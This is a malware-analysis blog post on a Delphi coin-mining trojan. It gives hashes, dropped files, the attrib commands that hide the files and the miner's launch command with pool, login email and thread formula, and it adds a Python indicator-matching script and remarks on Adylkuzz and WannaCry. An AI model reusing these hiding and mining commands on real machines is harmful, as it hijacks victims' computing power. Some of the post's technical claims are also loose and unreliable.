June 21, 2017


What is Trojan.CoinMiner csrss.exe

Trojan.CoinMiner uses the computing resources of the infected computer to mine cryptocurrency, most often Bitcoin.

The owner of such an infected computer may notice that some processes in the system use a large percentage of CPU, which often slows the computer down or even freezes it completely. The main problem with a miner program is that it uses your PC to make money for somebody else.

Small overheat you say?

For the average user it may just be a slowdown of the computer, but be careful: if you ignore this problem you can lose part of your PC to overheating. So if you notice CPU temperatures over 50 degrees, be ready for the possibility that someone is already using your PC for mining.

srvanyx.exe

Such viruses are often downloaded from the Internet by the users themselves: when a user opens an unknown file from a spam message, he infects the computer with some kind of malware or adware. But the developers often have a plan B: they attach such viruses to the installers of various free programs, so if you click through the installation process and don’t look at the advanced settings, be ready for your computer to be infected with a virus like this.

We discovered a sample of Trojan.CoinMiner written in Delphi, which is distributed via spam mail:

Trojan Coin Miner PEiD v0.95

GridinSoft Anti-Malware detects it as “Trojan.Win32.CoinMiner.dd” (as on the image below):
Trojan.Win32.CoinMiner.dd

MD5: 922e0891ae30ac3adb3a09cb963570cc
SHA1: 77feeefff422519cdb63faa438fea87e5e70882a

Other antivirus programs detect Trojan.CoinMiner (csrss.exe) as:

Antivirus     Result
DrWeb         Trojan.Hosts.6838
Emsisoft      Trojan.Agent.CEQQ (B)
ESET-NOD32    a variant of Win64/BitCoinMiner.AP potentially unsafe
Kaspersky     not-a-virus:RiskTool.Win64.BitCoinMiner.cev

The virus creates the following folder:

C:\Windows\MicrosoftU

and creates these files in it:

  • Auto.bat
  • Start.vbs
  • Start2.vbs
  • Hide.bat
  • Start.bat
  • Start2.bat
  • 1.bat
  • 2.bat
  • Srvany.exe
  • Csrss.exe
  • Srvanyx.exe

After Trojan.CoinMiner has been unpacked, it hides its presence using the strings in Hide.bat, setting the hidden and system attributes to the folder and files in it.
attrib C:\Windows\MicrosoftU +s +h /s /d
attrib C:\Windows\MicrosoftU\*.* +s +h /s /d

The “miner” uses the name of the legitimate system file “csrss.exe” to hide its presence in the system.

The virus starts with the following parameters:
stratum+tcp://xmr.pool.minergate.com:45560 – the mining pool the “miner” connects to
tatyana.kostomarova@gmail.com – the pool login (user account) to which the mined coins are credited
cryptonight – the mining algorithm

Another parameter is how many threads the program will run in. This “miner” has a formula for calculating the number of processor cores involved; it is in the .bat file that launches the “miner” for the first time:

set /a cpu=%NUMBER_OF_PROCESSORS%/2+1
srvanyx -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u tatyana.kostomarova@gmail.com -p x -t %cpu%
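As an added example (not part of the original post and not GridinSoft’s tooling), the following Python script applies the indicators above to a constructed process listing in the shape of `wmic process get CommandLine,ExecutablePath,Name /format:csv` output: a csrss.exe running outside System32, the dropped Srvany/Srvanyx names and the stratum/cryptonight command line. It also pulls the pool, login, algorithm and thread count out of the miner command line and reproduces the thread formula from the .bat file. The host name, the sample rows and the pool login `user@example.invalid` are constructed placeholders.

```python
import csv
import io
import re

# Indicators taken from the sample described in this post (not a complete list).
MINER_MARKERS = ("stratum+tcp://", "cryptonight", "xmr.pool.minergate.com")
DROPPED_NAMES = ("srvany.exe", "srvanyx.exe")
SYSTEM32 = "c:\\windows\\system32\\"

# Constructed sample in the shape of `wmic process get CommandLine,ExecutablePath,Name /format:csv`:
# the real csrss.exe, the fake one from C:\Windows\MicrosoftU, the miner, and a benign program.
# HOST1 and user@example.invalid are placeholders, not values from the post.
SAMPLE_WMIC_CSV = r"""Node,CommandLine,ExecutablePath,Name
HOST1,,C:\Windows\System32\csrss.exe,csrss.exe
HOST1,C:\Windows\MicrosoftU\csrss.exe,C:\Windows\MicrosoftU\csrss.exe,csrss.exe
HOST1,"srvanyx -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u user@example.invalid -p x -t 3",C:\Windows\MicrosoftU\Srvanyx.exe,Srvanyx.exe
HOST1,"C:\Program Files\Editor\editor.exe --safe",C:\Program Files\Editor\editor.exe,editor.exe
"""

def parse_miner_args(cmdline: str) -> dict:
    """Extract pool (-o), login (-u), algorithm (-a) and thread count (-t) from a miner command line."""
    opts = {}
    for flag, key in (("-o", "pool"), ("-u", "user"), ("-a", "algo"), ("-t", "threads")):
        m = re.search(rf"(?:^|\s){flag}\s+(\S+)", cmdline)
        if m:
            opts[key] = m.group(1)
    if opts.get("threads", "").isdigit():
        opts["threads"] = int(opts["threads"])
    return opts

def expected_threads(number_of_processors: int) -> int:
    """The dropper's formula: set /a cpu=%NUMBER_OF_PROCESSORS%/2+1 (cmd's set /a uses integer division)."""
    return number_of_processors // 2 + 1

def suspicious_processes(wmic_csv: str) -> list:
    """Return (process name, reason) for rows matching the indicators from this post."""
    hits = []
    for row in csv.DictReader(io.StringIO(wmic_csv)):
        name, path, cmd = row["Name"].lower(), row["ExecutablePath"].lower(), row["CommandLine"].lower()
        if name == "csrss.exe" and not path.startswith(SYSTEM32):
            hits.append((row["Name"], "csrss.exe outside System32: " + row["ExecutablePath"]))
        elif any(marker in cmd for marker in MINER_MARKERS):
            hits.append((row["Name"], "miner command line: " + row["CommandLine"]))
        elif name in DROPPED_NAMES:
            hits.append((row["Name"], "dropped file name from this sample: " + row["ExecutablePath"]))
    return hits
```

To hunt on a real machine, replace SAMPLE_WMIC_CSV with the saved output of the wmic command named in the comment and print what suspicious_processes returns.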


Nah, it’s fine, the computer is just a little slower

Another good example of a miner is Adylkuzz. This miner exploited an SMB vulnerability for several weeks, the same vulnerability used by the widespread WannaCry (Wana Decrypt0r), which infected millions of computers last week. The main difference between the two is that the Adylkuzz miner hides itself as deeply as possible and just uses the computer’s performance to mine Bitcoin, while WCry (Wana Decryptor) aggressively encrypts the data on the user’s computer.
msiexec.exe
Moreover, researchers are sure that the malicious Adylkuzz miner was infecting computers much earlier than WannaCry, at least since May 2, 2017. Adylkuzz did not attract as much attention as Wana Decrypt0r for the simple reason that an infection is much harder to notice in this case. The only “symptom” the victim may notice is a slowdown of the PC, as the miner uses the system’s resources. Specialists say that Adylkuzz actually protected the users it infected from WannaCry ransomware attacks: after the miner infects a computer, it closes the “hole” in SMB and does not allow other malware to use the gap.
Trojan Coin Miner REMOVAL
The specialists of both companies remind everyone who for some reason has not yet installed the MS17-010 update, which closes the gap in SMB, that it should be done immediately, and that port 445 should be blocked as well.

It is worth noting that a miner program by itself is used only for “mining” and does not carry a direct threat, but it can be used for undesirable actions. We highly recommend that you download a professional anti-malware tool, scan your PC with it and clean it up.
